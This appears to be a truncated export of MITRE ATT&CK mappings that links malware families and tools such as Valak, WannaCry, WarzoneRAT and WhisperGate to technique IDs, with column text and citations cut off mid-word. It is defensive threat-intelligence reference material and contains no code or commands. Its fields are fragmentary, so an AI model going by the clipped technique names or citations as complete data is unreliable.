S0386 Ursnif malware-- software uses T1080 Taint Shar attack-pat technique [Ursnif](ht
S0386 Ursnif malware-- software uses T1055.005Thread Locattack-pat technique [Ursnif](ht
S0386 Ursnif malware-- software uses T1497.003Time Basedattack-pat technique [Ursnif](ht
S0386 Ursnif malware-- software uses T1059.005Visual Basiattack-pat technique [Ursnif](h
S0386 Ursnif malware-- software uses T1071.001Web Protocattack-pat technique [Ursnif](ht
S0386 Ursnif malware-- software uses T1047 Windows M attack-pat technique [Ursnif](h
S0386 Ursnif malware-- software uses T1543.003Windows Se attack-pat technique [Ursnif](ht
S0442 VBShower malware--8software uses T1070.004File Deleti attack-pat technique [VBShower]
S0442 VBShower malware--8software uses T1105 Ingress Tooattack-pat technique [VBShower](
S0442 VBShower malware--8software uses T1547.001Registry Ruattack-pat technique [VBShower]
S0442 VBShower malware--8software uses T1059.005Visual Basiattack-pat technique [VBShower](
S0442 VBShower malware--8software uses T1071.001Web Protocattack-pat technique [VBShower]
S0257 VERMIN malware--5software uses T1560 Archive Coattack-pat technique [VERMIN](ht
S0257 VERMIN malware--5software uses T1123 Audio Captattack-pat technique [VERMIN](h
S0257 VERMIN malware--5software uses T1119 Automatedattack-pat technique [VERMIN](ht
S0257 VERMIN malware--5software uses T1115 Clipboard attack-pat technique [VERMIN](ht
S0257 VERMIN malware--5software uses T1140 Deobfuscatattack-pat technique [VERMIN](ht
S0257 VERMIN malware--5software uses T1027.013Encrypted/attack-pat technique [VERMIN](ht
S0257 VERMIN malware--5software uses T1070.004File Deleti attack-pat technique [VERMIN](ht
S0257 VERMIN malware--5software uses T1105 Ingress Tooattack-pat technique [VERMIN](h
S0257 VERMIN malware--5software uses T1056.001Keyloggingattack-pat technique [VERMIN](ht
S0257 VERMIN malware--5software uses T1057 Process Di attack-pat technique [VERMIN](ht
S0257 VERMIN malware--5software uses T1113 Screen Capattack-pat technique [VERMIN](h
S0257 VERMIN malware--5software uses T1518.001Security S attack-pat technique [VERMIN](ht
S0257 VERMIN malware--5software uses T1027.002Software Pattack-pat technique [VERMIN](ht
S0257 VERMIN malware--5software uses T1082 System Inf attack-pat technique [VERMIN](h
S0257 VERMIN malware--5software uses T1016 System Netattack-pat technique [VERMIN](ht
S0257 VERMIN malware--5software uses T1033 System Own attack-pat technique [VERMIN](h
S0257 VERMIN malware--5software uses T1071.001Web Protocattack-pat technique [VERMIN](h
S1010 VPNFilter malware-- software uses T1561.001Disk Conteattack-pat technique [VPNFilter]
S0476 Valak malware-- software uses T1119 Automatedattack-pat technique [Valak](htt
S0476 Valak malware-- software uses T1552.002Credentialsattack-pat technique [Valak](htt
S0476 Valak malware-- software uses T1140 Deobfuscatattack-pat technique [Valak](htt
S0476 Valak malware-- software uses T1087.002Domain Acattack-pat technique [Valak](ht
S0476 Valak malware-- software uses T1559.002Dynamic Daattack-pat technique [Valak](htt
S0476 Valak malware-- software uses T1041 Exfiltratio attack-pat technique [Valak](htt
S0476 Valak malware-- software uses T1008 Fallback C attack-pat technique [Valak](htt
S0476 Valak malware-- software uses T1027.011Fileless St attack-pat technique [Valak](htt
S0476 Valak malware-- software uses T1105 Ingress Tooattack-pat technique [Valak](ht
S0476 Valak malware-- software uses T1059.007JavaScript attack-pat technique [Valak](htt
S0476 Valak malware-- software uses T1087.001Local Acco attack-pat technique [Valak](htt
S0476 Valak malware-- software uses T1204.002Malicious Fattack-pat technique [Valak](htt
S0476 Valak malware-- software uses T1112 Modify Regattack-pat technique [Valak](ht
S0476 Valak malware-- software uses T1104 Multi-Stag attack-pat technique [Valak](htt
S0476 Valak malware-- software uses T1564.004NTFS File Aattack-pat technique [Valak](htt
S0476 Valak malware-- software uses T1027 Obfuscatedattack-pat technique [Valak](htt
S0476 Valak malware-- software uses T1059.001PowerShellattack-pat technique [Valak](ht
S0476 Valak malware-- software uses T1057 Process Di attack-pat technique [Valak](ht
S0476 Valak malware-- software uses T1012 Query Regiattack-pat technique [Valak](htt
S0476 Valak malware-- software uses T1218.010Regsvr32 attack-pat technique [Valak](htt
S0476 Valak malware-- software uses T1114.002Remote Ema attack-pat technique [Valak](htt
S0476 Valak malware-- software uses T1053.005Scheduled attack-pat technique [Valak](htt
S0476 Valak malware-- software uses T1113 Screen Capattack-pat technique [Valak](htt
S0476 Valak malware-- software uses T1518.001Security S attack-pat technique [Valak](htt
S0476 Valak malware-- software uses T1027.002Software Pattack-pat technique [Valak](htt
S0476 Valak malware-- software uses T1566.001Spearphishattack-pat technique [Valak](htt
S0476 Valak malware-- software uses T1566.002Spearphishattack-pat technique [Valak](htt
S0476 Valak malware-- software uses T1132.001Standard Eattack-pat technique [Valak](htt
S0476 Valak malware-- software uses T1082 System Inf attack-pat technique [Valak](ht
S0476 Valak malware-- software uses T1016 System Netattack-pat technique [Valak](htt
S0476 Valak malware-- software uses T1033 System Own attack-pat technique [Valak](htt
S0476 Valak malware-- software uses T1071.001Web Protocattack-pat technique [Valak](htt
S0476 Valak malware-- software uses T1555.004Windows Cattack-pat technique [Valak](ht
S0476 Valak malware-- software uses T1047 Windows M attack-pat technique [Valak](htt
S0636 VaporRagemalware-- software uses T1140 Deobfuscatattack-pat technique [VaporRage
S0636 VaporRagemalware-- software uses T1480 Execution attack-pat technique [VaporRage]
S0636 VaporRagemalware-- software uses T1105 Ingress Tooattack-pat technique [VaporRage
S0636 VaporRagemalware-- software uses T1071.001Web Protocattack-pat technique [VaporRage
S0207 Vasport malware--fsoftware uses T1105 Ingress Tooattack-pat technique [Vasport](
S0207 Vasport malware--fsoftware uses T1090 Proxy attack-pat technique [Vasport](h
S0207 Vasport malware--fsoftware uses T1547.001Registry Ruattack-pat technique [Vasport](h
S0207 Vasport malware--fsoftware uses T1071.001Web Protocattack-pat technique [Vasport](
S1154 VersaMemmalware--0software uses T1059 Command attack-pat
an technique [VersaMem](
S1154 VersaMemmalware--0software uses T1056.004Credential attack-pat technique [VersaMem](
S1154 VersaMemmalware--0software uses T1027.013Encrypted/attack-pat technique [VersaMem]
S1154 VersaMemmalware--0software uses T1203 Exploitatioattack-pat technique [VersaMem](
S1154 VersaMemmalware--0software uses T1070.004File Deleti attack-pat technique [VersaMem](
S1154 VersaMemmalware--0software uses T1074.001Local Data attack-pat technique [VersaMem](
S1154 VersaMemmalware--0software uses T1040 Network Snattack-pat technique [VersaMem](
S1154 VersaMemmalware--0software uses T1129 Shared Moattack-pat technique [VersaMem](
S0180 Volgmer malware-- software uses T1573.002Asymmetricattack-pat technique Some [Volg
S0180 Volgmer malware-- software uses T1140 Deobfuscatattack-pat technique [Volgmer](h
S0180 Volgmer malware-- software uses T1027.013Encrypted/attack-pat technique A [Volgmer]
S0180 Volgmer malware-- software uses T1070.004File Deleti attack-pat technique [Volgmer](h
S0180 Volgmer malware-- software uses T1083 File and Di attack-pat technique [Volgmer](h
S0180 Volgmer malware-- software uses T1027.011Fileless St attack-pat technique [Volgmer](
S0180 Volgmer malware-- software uses T1105 Ingress Tooattack-pat technique [Volgmer](
S0180 Volgmer malware-- software uses T1036.004Masquerade attack-pat technique Some [Volg
S0180 Volgmer malware-- software uses T1112 Modify Regattack-pat technique [Volgmer](
S0180 Volgmer malware-- software uses T1106 Native API attack-pat technique [Volgmer](
S0180 Volgmer malware-- software uses T1057 Process Di attack-pat technique [Volgmer](h
S0180 Volgmer malware-- software uses T1012 Query Regiattack-pat technique [Volgmer](h
S0180 Volgmer malware-- software uses T1573.001Symmetric attack-pat technique [Volgmer](h
S0180 Volgmer malware-- software uses T1082 System Inf attack-pat technique [Volgmer](
S0180 Volgmer malware-- software uses T1016 System Netattack-pat technique [Volgmer](
S0180 Volgmer malware-- software uses T1049 System Netattack-pat technique [Volgmer](
S0180 Volgmer malware-- software uses T1007 System Serattack-pat technique [Volgmer](h
S0180 Volgmer malware-- software uses T1059.003Windows Cattack-pat technique [Volgmer](
S0180 Volgmer malware-- software uses T1543.003Windows Se attack-pat technique [Volgmer](h
S1116 WARPWIREmalware-- software uses T1554 Compromise attack-pat technique [WARPWIRE]
S1116 WARPWIREmalware-- software uses T1048.003Exfiltrati attack-pat technique [WARPWIRE](
S1116 WARPWIREmalware-- software uses T1059.007JavaScript attack-pat technique [WARPWIRE](
S1116 WARPWIREmalware-- software uses T1132.001Standard Eattack-pat technique [WARPWIRE]
S1116 WARPWIREmalware-- software uses T1056.003Web Portalattack-pat technique [WARPWIRE](
S0109 WEBC2 malware--1software uses T1574.001DLL Searchattack-pat technique Variants o
S0109 WEBC2 malware--1software uses T1105 Ingress Tooattack-pat technique [WEBC2](ht
S0109 WEBC2 malware--1software uses T1059.003Windows Cattack-pat technique [WEBC2](ht
S0155 WINDSHIE malware-- software uses T1070.004File Deleti attack-pat technique [WINDSHIELD
S0155 WINDSHIE malware-- software uses T1095 Non-Applicattack-pat technique [WINDSHIEL
S0155 WINDSHIE malware-- software uses T1012 Query Regiattack-pat technique [WINDSHIEL
S0155 WINDSHIE malware-- software uses T1082 System Inf attack-pat technique [WINDSHIEL
S0155 WINDSHIE malware-- software uses T1033 System Own attack-pat technique [WINDSHIEL
S0219 WINERACKmalware-- software uses T1010 Applicatio attack-pat technique [WINERACK]
S0219 WINERACKmalware-- software uses T1059 Command attack-pat
an technique [WINERACK]
S0219 WINERACKmalware-- software uses T1083 File and Di attack-pat technique [WINERACK](
S0219 WINERACKmalware-- software uses T1057 Process Di attack-pat technique [WINERACK]
S0219 WINERACKmalware-- software uses T1082 System Inf attack-pat technique [WINERACK]
S0219 WINERACKmalware-- software uses T1033 System Own attack-pat technique [WINERACK]
S0219 WINERACKmalware-- software uses T1007 System Serattack-pat technique [WINERACK]
S1115 WIREFIRE malware-- software uses T1554 Compromise attack-pat technique [WIREFIRE](
S1115 WIREFIRE malware-- software uses T1140 Deobfuscatattack-pat technique [WIREFIRE]
S1115 WIREFIRE malware-- software uses T1105 Ingress Tooattack-pat technique [WIREFIRE](
S1115 WIREFIRE malware-- software uses T1132.001Standard Eattack-pat technique [WIREFIRE]
S1115 WIREFIRE malware-- software uses T1573.001Symmetric attack-pat technique [WIREFIRE]
S1115 WIREFIRE malware-- software uses T1071.001Web Protocattack-pat technique [WIREFIRE](
S1115 WIREFIRE malware-- software uses T1505.003Web Shell attack-pat technique [WIREFIRE]
S0366 WannaCry malware--7software uses T1573.002Asymmetricattack-pat technique [WannaCry](
S0366 WannaCry malware--7software uses T1486 Data Encryattack-pat technique [WannaCry]
S0366 WannaCry malware--7software uses T1210 Exploitatioattack-pat technique [WannaCry]
S0366 WannaCry malware--7software uses T1083 File and Di attack-pat technique [WannaCry](
S0366 WannaCry malware--7software uses T1564.001Hidden Fileattack-pat technique [WannaCry]
S0366 WannaCry malware--7software uses T1490 Inhibit Sy attack-pat technique [WannaCry]
S0366 WannaCry malware--7software uses T1570 Lateral Tooattack-pat technique [WannaCry]
S0366 WannaCry malware--7software uses T1090.003Multi-hop attack-pat technique [WannaCry]
S0366 WannaCry malware--7software uses T1120 Peripheral attack-pat technique [WannaCry](
S0366 WannaCry malware--7software uses T1563.002RDP Hijackattack-pat technique [WannaCry]
S0366 WannaCry malware--7software uses T1018 Remote Sysattack-pat technique [WannaCry](
S0366 WannaCry malware--7software uses T1489 Service Stoattack-pat technique [WannaCry](
S0366 WannaCry malware--7software uses T1016 System Netattack-pat technique [WannaCry](
S0366 WannaCry malware--7software uses T1222.001Windows Fiattack-pat technique [WannaCry](
S0366 WannaCry malware--7software uses T1047 Windows M attack-pat technique [WannaCry]
S0366 WannaCry malware--7software uses T1543.003Windows Se attack-pat technique [WannaCry]
S0670 WarzoneR malware-- software uses T1548.002Bypass Useattack-pat technique [WarzoneRA
S0670 WarzoneR malware-- software uses T1546.015Componentattack-pat technique [WarzoneRA
S0670 WarzoneR malware-- software uses T1555.003Credential attack-pat technique [WarzoneRA
S0670 WarzoneR malware-- software uses T1005 Data from attack-pat technique [WarzoneRA
S0670 WarzoneR malware-- software uses T1140 Deobfuscatattack-pat technique [WarzoneRA
S0670 WarzoneR malware-- software uses T1562.001Disable or attack-pat technique [WarzoneRA
S0670 WarzoneR malware-- software uses T1041 Exfiltratio attack-pat technique [WarzoneRAT
S0670 WarzoneR malware-- software uses T1083 File and Di attack-pat technique [WarzoneRA
S0670 WarzoneR malware-- software uses T1564.003Hidden Wi attack-pat technique WarzoneRAT
S0670 WarzoneR malware-- software uses T1564 Hide Artifaattack-pat technique [WarzoneRA
S0670 WarzoneR malware-- software uses T1105 Ingress Tooattack-pat technique [WarzoneRA
S0670 WarzoneR malware-- software uses T1056.001Keyloggingattack-pat technique [WarzoneRAT
S0670 WarzoneR malware-- software uses T1204.002Malicious Fattack-pat technique [WarzoneRAT
S0670 WarzoneR malware-- software uses T1112 Modify Regattack-pat technique [WarzoneRA
S0670 WarzoneR malware-- software uses T1106 Native API attack-pat technique [WarzoneRA
S0670 WarzoneR malware-- software uses T1095 Non-Applicattack-pat technique [WarzoneRA
S0670 WarzoneR malware-- software uses T1059.001PowerShellattack-pat technique [WarzoneRA
S0670 WarzoneR malware-- software uses T1057 Process Di attack-pat technique [WarzoneRA
S0670 WarzoneR malware-- software uses T1055 Process Injattack-pat technique [WarzoneRAT
S0670 WarzoneR malware-- software uses T1090 Proxy attack-pat technique [WarzoneRAT
S0670 WarzoneR malware-- software uses T1547.001Registry Ruattack-pat technique [WarzoneRA
S0670 WarzoneR malware-- software uses T1021.001Remote Des attack-pat technique [WarzoneRAT
S0670 WarzoneR malware-- software uses T1014 Rootkit attack-pat technique [WarzoneRAT
S0670 WarzoneR malware-- software uses T1566.001Spearphishattack-pat technique [WarzoneRA
S0670 WarzoneR malware-- software uses T1573.001Symmetric attack-pat technique [WarzoneRA
S0670 WarzoneR malware-- software uses T1082 System Inf attack-pat technique [WarzoneRA
S0670 WarzoneR malware-- software uses T1221 Template Iattack-pat technique [WarzoneRA
S0670 WarzoneR malware-- software uses T1021.005VNC attack-pat technique [WarzoneRA
S0670 WarzoneR malware-- software uses T1125 Video Captattack-pat technique [WarzoneRA
S0670 WarzoneR malware-- software uses T1059.003Windows Cattack-pat technique [WarzoneRA
S0612 WastedLocmalware-- software uses T1027.001Binary Padattack-pat technique [WastedLock
S0612 WastedLocmalware-- software uses T1548.002Bypass Useattack-pat technique [WastedLock
S0612 WastedLocmalware-- software uses T1574.001DLL Searchattack-pat technique [WastedLo
S0612 WastedLocmalware-- software uses T1486 Data Encryattack-pat technique [WastedLoc
S0612 WastedLocmalware-- software uses T1140 Deobfuscatattack-pat technique [WastedLoc
S0612 WastedLocmalware-- software uses T1027.013Encrypted/attack-pat technique The [Wasted
S0612 WastedLocmalware-- software uses T1083 File and Di attack-pat technique [WastedLock
S0612 WastedLocmalware-- software uses T1564.001Hidden Fileattack-pat technique [WastedLoc
S0612 WastedLocmalware-- software uses T1490 Inhibit Sy attack-pat technique [WastedLoc
S0612 WastedLocmalware-- software uses T1112 Modify Regattack-pat technique [WastedLoc
S0612 WastedLocmalware-- software uses T1564.004NTFS File Aattack-pat technique [WastedLock
S0612 WastedLocmalware-- software uses T1106 Native API attack-pat technique [WastedLock
S0612 WastedLocmalware-- software uses T1135 Network Shattack-pat technique [WastedLock
S0612 WastedLocmalware-- software uses T1120 Peripheral attack-pat technique [WastedLock
S0612 WastedLocmalware-- software uses T1012 Query Regiattack-pat technique [WastedLoc
S0612 WastedLocmalware-- software uses T1569.002Service Ex attack-pat technique [WastedLock
S0612 WastedLocmalware-- software uses T1497.001System Cheattack-pat technique [WastedLoc
S0612 WastedLocmalware-- software uses T1059.003Windows Cattack-pat technique [WastedLoc
S0612 WastedLocmalware-- software uses T1222.001Windows Fiattack-pat technique [WastedLoc
S0612 WastedLocmalware-- software uses T1543.003Windows Se attack-pat technique [WastedLock
S0579 Waterbearmalware--fsoftware uses T1574.002DLL Side-L attack-pat technique [Waterbear
S0579 Waterbearmalware--fsoftware uses T1140 Deobfuscatattack-pat technique [Waterbear]
S0579 Waterbearmalware--fsoftware uses T1027.013Encrypted/attack-pat technique [Waterbear
S0579 Waterbearmalware--fsoftware uses T1562.006Indicator Battack-pat technique [Waterbear
S0579 Waterbearmalware--fsoftware uses T1027.005Indicator attack-pat technique [Waterbear
S0579 Waterbearmalware--fsoftware uses T1105 Ingress Tooattack-pat technique [Waterbear
S0579 Waterbearmalware--fsoftware uses T1112 Modify Regattack-pat technique [Waterbear]
S0579 Waterbearmalware--fsoftware uses T1106 Native API attack-pat technique [Waterbear
S0579 Waterbearmalware--fsoftware uses T1057 Process Di attack-pat technique [Waterbear]
S0579 Waterbearmalware--fsoftware uses T1055 Process Injattack-pat technique [Waterbear
S0579 Waterbearmalware--fsoftware uses T1012 Query Regiattack-pat technique [Waterbear
S0579 Waterbearmalware--fsoftware uses T1518.001Security S attack-pat technique [Waterbear]
S0579 Waterbearmalware--fsoftware uses T1049 System Netattack-pat technique [Waterbear]
S0579 Waterbearmalware--fsoftware uses T1055.003Thread Exeattack-pat technique [Waterbear]
S0515 WellMail malware-- software uses T1560 Archive Coattack-pat technique [WellMail](
S0515 WellMail malware-- software uses T1573.002Asymmetricattack-pat technique [WellMail](
S0515 WellMail malware-- software uses T1005 Data from attack-pat technique [WellMail](
S0515 WellMail malware-- software uses T1140 Deobfuscatattack-pat technique [WellMail](
S0515 WellMail malware-- software uses T1105 Ingress Tooattack-pat technique [WellMail](
S0515 WellMail malware-- software uses T1095 Non-Applicattack-pat technique [WellMail](
S0515 WellMail malware-- software uses T1571 Non-Standaattack-pat technique [WellMail]
S0515 WellMail malware-- software uses T1016 System Netattack-pat technique [WellMail](
S0515 WellMail malware-- software uses T1033 System Own attack-pat technique [WellMail](
S0514 WellMess malware-- software uses T1573.002Asymmetricattack-pat technique [WellMess]
S0514 WellMess malware-- software uses T1071.004DNS attack-pat technique [WellMess](
S0514 WellMess malware-- software uses T1005 Data from attack-pat technique [WellMess](
S0514 WellMess malware-- software uses T1140 Deobfuscatattack-pat technique [WellMess]
S0514 WellMess malware-- software uses T1069.002Domain Grattack-pat technique [WellMess]
S0514 WellMess malware-- software uses T1105 Ingress Tooattack-pat technique [WellMess](
S0514 WellMess malware-- software uses T1001.001Junk Data attack-pat technique [WellMess](
S0514 WellMess malware-- software uses T1059.001PowerShellattack-pat technique [WellMess](
S0514 WellMess malware-- software uses T1132.001Standard Eattack-pat technique [WellMess]
S0514 WellMess malware-- software uses T1573.001Symmetric attack-pat technique [WellMess]
S0514 WellMess malware-- software uses T1082 System Inf attack-pat technique [WellMess]
S0514 WellMess malware-- software uses T1016 System Netattack-pat technique [WellMess](
S0514 WellMess malware-- software uses T1033 System Own attack-pat technique [WellMess](
S0514 WellMess malware-- software uses T1071.001Web Protocattack-pat technique [WellMess]
S0514 WellMess malware-- software uses T1059.003Windows Cattack-pat technique [WellMess]
S0645 Wevtutil tool--f911 software uses T1070.001Clear Windattack-pat technique [Wevtutil](
S0645 Wevtutil tool--f911 software uses T1005 Data from attack-pat technique [Wevtutil](
S0645 Wevtutil tool--f911 software uses T1562.002Disable Wiattack-pat technique [Wevtutil](
S0689 WhisperGamalware-- software uses T1542.003Bootkit attack-pat technique [WhisperGa
S0689 WhisperGamalware-- software uses T1134.002Create Proattack-pat technique The [Whisp
S0689 WhisperGamalware-- software uses T1485 Data Destrattack-pat technique [WhisperGa
S0689 WhisperGamalware-- software uses T1140 Deobfuscatattack-pat technique [WhisperGa
S0689 WhisperGamalware-- software uses T1562.001Disable or attack-pat technique [WhisperGa
S0689 WhisperGamalware-- software uses T1561.001Disk Conteattack-pat technique [WhisperGat
S0689 WhisperGamalware-- software uses T1561.002Disk Struc attack-pat technique [WhisperGa
S0689 WhisperGamalware-- software uses T1027.013Encrypted/attack-pat technique [WhisperGat
S0689 WhisperGamalware-- software uses T1070.004File Deleti attack-pat technique [WhisperGat
S0689 WhisperGamalware-- software uses T1083 File and Di attack-pat technique [WhisperGa
S0689 WhisperGamalware-- software uses T1105 Ingress Tooattack-pat technique [WhisperGa
S0689 WhisperGamalware-- software uses T1218.004InstallUtil attack-pat technique [WhisperGat
S0689 WhisperGamalware-- software uses T1036 Masqueradattack-pat technique [WhisperGat
S0689 WhisperGamalware-- software uses T1106 Native API attack-pat technique [WhisperGat
S0689 WhisperGamalware-- software uses T1135 Network Shattack-pat technique [WhisperGa
S0689 WhisperGamalware-- software uses T1059.001PowerShellattack-pat technique [WhisperGa
S0689 WhisperGamalware-- software uses T1055.012Process Hoattack-pat technique [WhisperGat
S0689 WhisperGamalware-- software uses T1620 Reflective attack-pat technique [WhisperGat
S0689 WhisperGamalware-- software uses T1518.001Security S attack-pat technique [WhisperGat
S0689 WhisperGamalware-- software uses T1569.002Service Ex attack-pat technique [WhisperGa
S0689 WhisperGamalware-- software uses T1497.001System Cheattack-pat technique [WhisperGat
S0689 WhisperGamalware-- software uses T1082 System Inf attack-pat technique [WhisperGat
S0689 WhisperGamalware-- software uses T1529 System Sh attack-pat technique [WhisperGa
S0689 WhisperGamalware-- software uses T1497.003Time Basedattack-pat technique [WhisperGa
S0689 WhisperGamalware-- software uses T1059.005Visual Basiattack-pat technique [WhisperGat
S0689 WhisperGamalware-- software uses T1071.001Web Protocattack-pat technique [WhisperGa
S0689 WhisperGamalware-- software uses T1102 Web Servicattack-pat technique [WhisperGa
S0689 WhisperGamalware-- software uses T1059.003Windows Cattack-pat technique [WhisperGa
S0206 Wiarp malware-- software uses T1105 Ingress Tooattack-pat technique [Wiarp](ht
S0206 Wiarp malware-- software uses T1055 Process Injattack-pat technique [Wiarp](htt
S0206 Wiarp malware-- software uses T1059.003Windows Cattack-pat technique [Wiarp](ht
S0206 Wiarp malware-- software uses T1543.003Windows Se attack-pat technique [Wiarp](ht
S0059 WinMM malware-- software uses T1008 Fallback C attack-pat technique [WinMM](ht
S0059 WinMM malware-- software uses T1083 File and Di attack-pat technique [WinMM](ht
S0059 WinMM malware-- software uses T1057 Process Di attack-pat technique [WinMM](ht
S0059 WinMM malware-- software uses T1082 System Inf attack-pat technique [WinMM](htt
S0059 WinMM malware-- software uses T1033 System Own attack-pat technique [WinMM](htt
S0059 WinMM malware-- software uses T1071.001Web Protocattack-pat technique [WinMM](ht
S0466 WindTail malware--0software uses T1560.001Archive viaattack-pat technique [WindTail](
S0466 WindTail malware--0software uses T1119 Automatedattack-pat technique [WindTail](
S0466 WindTail malware--0software uses T1140 Deobfuscatattack-pat technique [WindTail](
S0466 WindTail malware--0software uses T1027.013Encrypted/attack-pat technique [WindTail](
S0466 WindTail malware--0software uses T1048.003Exfiltrati attack-pat technique [WindTail](
S0466 WindTail malware--0software uses T1070.004File Deleti attack-pat technique [WindTail](
S0466 WindTail malware--0software uses T1083 File and Di attack-pat technique [WindTail](
S0466 WindTail malware--0software uses T1564.003Hidden Wi attack-pat technique [WindTail](
S0466 WindTail malware--0software uses T1036.001Invalid Codattack-pat technique [WindTail](
S0466 WindTail malware--0software uses T1036 Masqueradattack-pat technique [WindTail](
S0466 WindTail malware--0software uses T1106 Native API attack-pat technique [WindTail]
S0466 WindTail malware--0software uses T1124 System Timattack-pat technique [WindTail](
S0466 WindTail malware--0software uses T1059.004Unix Shell attack-pat technique [WindTail]
S0466 WindTail malware--0software uses T1071.001Web Protocattack-pat technique [WindTail](
S0005 Windows Cr tool--242f software uses T1003.001LSASS Memattack-pat technique [Windows C
S0191 Winexe tool--96fd software uses T1569.002Service Ex attack-pat technique [Winexe](ht
S0176 Wingbird malware-- software uses T1574.002DLL Side-L attack-pat technique [Wingbird](
S0176 Wingbird malware-- software uses T1068 Exploitatioattack-pat technique [Wingbird](
S0176 Wingbird malware-- software uses T1070.004File Deleti attack-pat technique [Wingbird](
S0176 Wingbird malware-- software uses T1547.008LSASS Driv attack-pat technique [Wingbird](
S0176 Wingbird malware-- software uses T1055 Process Injattack-pat technique [Wingbird](
S0176 Wingbird malware-- software uses T1518.001Security S attack-pat technique [Wingbird](
S0176 Wingbird malware-- software uses T1569.002Service Ex attack-pat technique [Wingbird](
S0176 Wingbird malware-- software uses T1082 System Inf attack-pat technique [Wingbird](
S0176 Wingbird malware-- software uses T1543.003Windows Se attack-pat technique [Wingbird](
S0430 Winnti for malware-- software uses T1140 Deobfuscatattack-pat technique [Winnti for
S0430 Winnti for malware-- software uses T1027.013Encrypted/attack-pat technique [Winnti for
S0430 Winnti for malware-- software uses T1105 Ingress Tooattack-pat technique [Winnti for
S0430 Winnti for malware-- software uses T1095 Non-Applicattack-pat technique [Winnti fo
S0430 Winnti for malware-- software uses T1014 Rootkit attack-pat technique [Winnti for
S0430 Winnti for malware-- software uses T1573.001Symmetric attack-pat technique [Winnti for
S0430 Winnti for malware-- software uses T1205 Traffic Signattack-pat technique [Winnti for
S0430 Winnti for malware-- software uses T1071.001Web Protocattack-pat technique [Winnti for
S0141 Winnti for malware-- software uses T1548.002Bypass Useattack-pat technique [Winnti for
S0141 Winnti for malware-- software uses T1140 Deobfuscatattack-pat technique The [Winnt
S0141 Winnti for malware-- software uses T1027.013Encrypted/attack-pat technique [Winnti for
S0141 Winnti for malware-- software uses T1480.001Environmen attack-pat technique The [Winnti
S0141 Winnti for malware-- software uses T1090.002External Prattack-pat technique The [Winnt
S0141 Winnti for malware-- software uses T1070.004File Deleti attack-pat technique [Winnti for
S0141 Winnti for malware-- software uses T1083 File and Di attack-pat technique [Winnti for
S0141 Winnti for malware-- software uses T1105 Ingress Tooattack-pat technique The [Winnti
S0141 Winnti for malware-- software uses T1090.001Internal Prattack-pat technique The [Winnti
S0141 Winnti for malware-- software uses T1036.005Match Legiattack-pat technique A [Winnti f
S0141 Winnti for malware-- software uses T1106 Native API attack-pat technique [Winnti for
S0141 Winnti for malware-- software uses T1095 Non-Applicattack-pat technique [Winnti fo
S0141 Winnti for malware-- software uses T1057 Process Di attack-pat technique [Winnti for
S0141 Winnti for malware-- software uses T1547.001Registry Ruattack-pat technique [Winnti for
S0141 Winnti for malware-- software uses T1218.011Rundll32 attack-pat technique The [Winnti
S0141 Winnti for malware-- software uses T1569.002Service Ex attack-pat technique [Winnti for
S0141 Winnti for malware-- software uses T1573.001Symmetric attack-pat technique [Winnti for
S0141 Winnti for malware-- software uses T1082 System Inf attack-pat technique [Winnti fo
S0141 Winnti for malware-- software uses T1070.006Timestompattack-pat technique [Winnti for
S0141 Winnti for malware-- software uses T1071.001Web Protocattack-pat technique [Winnti for
S0141 Winnti for malware-- software uses T1543.003Windows Se attack-pat technique [Winnti for
S0041 Wiper malware-- software uses T1072 Software Dattack-pat technique It is belie
S1065 Woody RA malware-- software uses T1087 Account Diattack-pat technique [Woody RAT
S1065 Woody RA malware-- software uses T1573.002Asymmetricattack-pat technique [Woody RAT
S1065 Woody RA malware-- software uses T1005 Data from attack-pat technique [Woody RAT
S1065 Woody RA malware-- software uses T1140 Deobfuscatattack-pat technique [Woody RAT
S1065 Woody RA malware-- software uses T1027.013Encrypted/attack-pat technique [Woody RAT
S1065 Woody RA malware-- software uses T1041 Exfiltratio attack-pat technique [Woody RAT]
S1065 Woody RA malware-- software uses T1203 Exploitatioattack-pat technique [Woody RAT
S1065 Woody RA malware-- software uses T1070.004File Deleti attack-pat technique [Woody RAT]
S1065 Woody RA malware-- software uses T1083 File and Di attack-pat technique [Woody RAT]
S1065 Woody RA malware-- software uses T1562.006Indicator Battack-pat technique [Woody RAT
S1065 Woody RA malware-- software uses T1105 Ingress Tooattack-pat technique [Woody RAT
S1065 Woody RA malware-- software uses T1016.001Internet C attack-pat technique [Woody RAT
S1065 Woody RA malware-- software uses T1204.002Malicious Fattack-pat technique [Woody RAT
S1065 Woody RA malware-- software uses T1106 Native API attack-pat technique [Woody RAT
S1065 Woody RA malware-- software uses T1059.001PowerShellattack-pat technique [Woody RAT
S1065 Woody RA malware-- software uses T1057 Process Di attack-pat technique [Woody RAT
S1065 Woody RA malware-- software uses T1055.012Process Hoattack-pat technique [Woody RAT
S1065 Woody RA malware-- software uses T1055 Process Injattack-pat technique [Woody RAT
S1065 Woody RA malware-- software uses T1012 Query Regiattack-pat technique [Woody RAT
S1065 Woody RA malware-- software uses T1113 Screen Capattack-pat technique [Woody RAT
S1065 Woody RA malware-- software uses T1518.001Security S attack-pat technique [Woody RAT
S1065 Woody RA malware-- software uses T1518 Software Dattack-pat technique [Woody RAT
S1065 Woody RA malware-- software uses T1566.001Spearphishattack-pat technique [Woody RAT
S1065 Woody RA malware-- software uses T1573.001Symmetric attack-pat technique [Woody RAT
S1065 Woody RA malware-- software uses T1082 System Inf attack-pat technique [Woody RAT
S1065 Woody RA malware-- software uses T1016 System Netattack-pat technique [Woody RAT
S1065 Woody RA malware-- software uses T1033 System Own attack-pat technique [Woody RAT
S1065 Woody RA malware-- software uses T1071.001Web Protocattack-pat technique [Woody RAT
S1065 Woody RA malware-- software uses T1059.003Windows Cattack-pat technique [Woody RAT
S0161 XAgentOSXmalware-- software uses T1555.003Credential attack-pat technique [XAgentOSX
S0161 XAgentOSXmalware-- software uses T1070.004File Deleti attack-pat technique [XAgentOSX
S0161 XAgentOSXmalware-- software uses T1071.002File Transf attack-pat technique [XAgentOSX
S0161 XAgentOSXmalware-- software uses T1083 File and Di attack-pat technique [XAgentOSX]
S0161 XAgentOSXmalware-- software uses T1056.001Keyloggingattack-pat technique [XAgentOSX]
S0161 XAgentOSXmalware-- software uses T1106 Native API attack-pat technique [XAgentOSX]
S0161 XAgentOSXmalware-- software uses T1057 Process Di attack-pat technique [XAgentOSX
S0161 XAgentOSXmalware-- software uses T1113 Screen Capattack-pat technique [XAgentOSX
S0161 XAgentOSXmalware-- software uses T1082 System Inf attack-pat technique [XAgentOSX]
S0161 XAgentOSXmalware-- software uses T1033 System Own attack-pat technique [XAgentOSX]
